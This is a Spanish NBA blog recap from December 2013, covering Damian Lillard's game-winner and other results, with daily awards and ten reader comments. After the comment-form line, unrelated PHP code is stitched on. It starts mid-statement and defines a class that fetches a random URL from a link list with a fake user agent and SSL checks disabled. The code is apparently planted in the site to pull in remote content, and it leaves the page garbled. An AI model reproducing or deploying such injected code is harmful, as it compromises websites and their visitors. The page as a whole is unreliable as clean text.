La Crónica: Lillard la vuelve a liar

18 de December de 2013 por txusma

Back-to-back de los Blazers y 2ª canasta decisiva consecutiva de Damian Lillard. La de ayer la clavó desde 9 metros y con Alonzo Gee completamente encima lo que da una idea del talento de este jugador de segundo año que está llamado a ser uno de los grandes de los próximos años. El tiro complementaba una actuación sublime de 36 puntos con 8 triples de 12 intentos, 10 asistencias y 8 rebotes. Cavs y Blazers protagonizaron uno de los mejores partidos del año con alternativas para ambos equipos hasta el segundo final. Cleveland empezó dominando el último cuarto, Portland remontó y a falta de 1’15 ganaba de 8 puntos, los Cavs fueron aún capaces de igualar el partido con 7 segundos en el marcador y Lillard certificó la victoria visitante (119-116). 

En la bahía volvió Andre Iguodala y los Warriors se llevaron una cómoda victoria ante los Pelicans. ¿Casualidad? El ex de Sixers y Nuggets jugó sólo 17 minutos pero sobretodo porque el partido quedó prácticamente decidido en la primera parte en la que, con Iguodala en pista, Golden State anotó 20 puntos más que New Orleans. Stephen Curry y David Lee destrozaron a sus pares y pudieron tomarse la mayor parte del encuentro de manera muy relajada (93-104). Algo más sudaron los Thunder pero también se llevaron la victoria, ellos del siempre complicado Pepsi Center de Denver. Tras perder una ventaja de 12 puntos a mediados del segundo cuarto, Durant y Westbrook se pusieron las pilas para volver a poner tierra de por medio y conseguir unos 10 puntos de ventaja que pudieron mantener hasta el final (105-93).

En los otros dos partidos del día, Charlotte se impuso a Sacramento a pesar del partidazo de Demarcus Cousins (87-95) y los Lakers se impusieron a los Grizzlies liderados por Pau Gasol y por un Kobe Bryant que cada día se encuentra mejor y completó su mejor actuación desde su retorno ante uno de los mejores defensores exteriores de la liga (96-92).

PREMIOS

MVP: No hay discusión. La hoja de estadísticas de Damian Lillard (36-8-10) unida a esa super canasta a 0’4 segundos del final le otorgan el premio del día. El único que se lo podría discutir, y de lejos, sería Stephen Curry autor de 28 puntos, 12 asistencias, 4 rebotes y 3 robos.

Rookie: Ben McLemore y Cody Zeller se enfrentaron anoche y podríamos declarar vencedor a los puntos al jugador de los Bobcats que anotó 7 puntos, capturó 5 rebotes y dio 2 asistencias. El de los Kings también anotó 7 puntos.

Sorpresa: La lesión de Mike Conley le dio la oportunidad a Nick Calathes de disfrutar de minutos. El jugador griego la aprovechó bien con 10 puntos y 2 robos.

Decepción: Sin Anthony Davis ni Tyreke Evans, los Pelicans necesitan a Eric Gordon más que nunca. Actuaciones como las de ayer (5 puntos con 1 de 9 en TC) hunden cualquier posibilidad de victoria de su equipo. Rudy Gay también hundió a los Kings. Se quedó en 4 puntos con un 1 de 6 en TC.

Esfuerzo en vano: Esta vez los 30 puntos, 17 rebotes y 6 asistencias de Demarcus Cousins no sirvieron para conseguir la victoria y es que sus compañeros no estuvieron muy acertados, en especial el anteriormente nombrado.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

10 comentarios a esta entrada

  1. Simon dice:
    #1

    Stoudmire baja indefinida… el problema es el de siempre, que esas rodillas están hechas polvo al estilo Greg Oden… una pena.

      Citar

  2. Esteban dice:
    #2

    otro gran partido de kamba walker en otra victoria, sin dudas un base muy util

    veo un buen presente y un mejor futuro para los Hornets, walker, taylor, jefferson, MKG, Zeller Biyombo y Sessions, sumado a alguna estrella que puedan sacar de la agencia libre con tanto espacio, veo un buen futuro en Carolina del Norte

      Citar

  3. Ruxixón dice:
    #3

    En un mundo en el que los one&done son el pan de cada día,no está de más recordar que Lillard completó ciclo universitario y que llegó a la NBA totalmente preparado sin sufrir rookie wall ni nada de eso.Habrá ganado menos dinero por contratos pero su status actual puede ser que le repercuta en mayores ganancias fuera de la competición.Denise es muy crítico con Smart por no haberse presentado en este pasado draft pero creo que este 2º año en Oklahoma State le vendrá bien para ser un jugador mucho más desarrollado al máximo nivel.

      Citar

  4. Denise dice:
    #4

    Ruxixón:
    .Denise es muy crítico con Smart por no haberse presentado en este pasado draft pero creo que este 2º año en Oklahoma State le vendrá bien para ser un jugador mucho más desarrollado al máximo nivel.

    Pero es que te juegas no tu vida deportiva sino la personal, y no esta la cosa como para andarse tikismkikis rechazando contratos, recuerda que Smart hubiese sido claramente el pick 2.
    Si a ti te ofrecen hoy un trabajo con contrato de 9 millones en los proximos años, ó uno similar el año que viene mas un curso de ingles y aleman que te prepare mas pero con la preocupación de que como te partas las piernas, adios al contrato ¿que haces? ya dice el refran que mas vale pajaro en mano que cientos volando.
    Y por mucho NCAA..creo que se debe progresar mas jugando con los mas grandes cada noche en la NBA, siempre y cuando te den minutos, que en el caso de Smart hubiee tenido de sobra en los Magic, fijate Oladipo.

    Hablando de NCAA, ya no está tan claro que Wiggins vaya a ser nº1, En los diferentes mocks que hay empieza a ser frecuente verlo en el 3, generalmente por detras de Jabari y Randle. Que ganas tengo que llegue este Draft con probablemente 2 primeras rondas top 15 para mis Magic. Seguramente este sea el primer año que veré algo en directo de la March Madness.

      Citar

  5. Denise dice:
    #5

    Por cierto lo de los motes en las camisetas me parece una subnormalida epica, propia de una liga subdesarrollada que intenta llamar la atención con alguna payasada. Espero que la NBA prohiba esto y no se convierta esto en un festival de gilipolleces., ¿que va a ser lo proximo?¿el patrocinio en el nombre del equipo como en Europa…? Los Ángeles Microsoft, Boston McDonalds y Jabones Pardo Milwaukee…xD

      Citar

  6. Denise dice:
    #6

    Esteban:
    otro gran partido de kamba walker en otra victoria, sin dudas un base muy util

    veo un buen presente y un mejor futuro para los Hornets, walker, taylor, jefferson, MKG, Zeller Biyombo y Sessions, sumado a alguna estrella que puedan sacar de la agencia libre contanto espacio, veo un buen futuro en Carolina del Norte

    Esteban, machote, a ver si te pasas un dia por la Hoops, , que te mandé un trade Nelson-Jarret Jack y lo he cancelado harto de esperar tu respuesta…

      Citar

  7. Esteban dice:
    #7

    Denise, finalmente no lo he jugado simplemente por no entender como se jugaba

      Citar

  8. Txusma dice:
    #8

    Esteban:
    Denise, finalmente no lo he jugado simplemente por no entender como se jugaba

    Hombre, podrías haber preguntado por el foro de la Hoops…

      Citar

  9. Sancho88 dice:
    #9

    Vaya robo a los Pacers…

      Citar

  10. arvydas dice:
    #10

    Sancho88:
    Vaya robo a los Pacers…

    Por el ultimo tripe?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>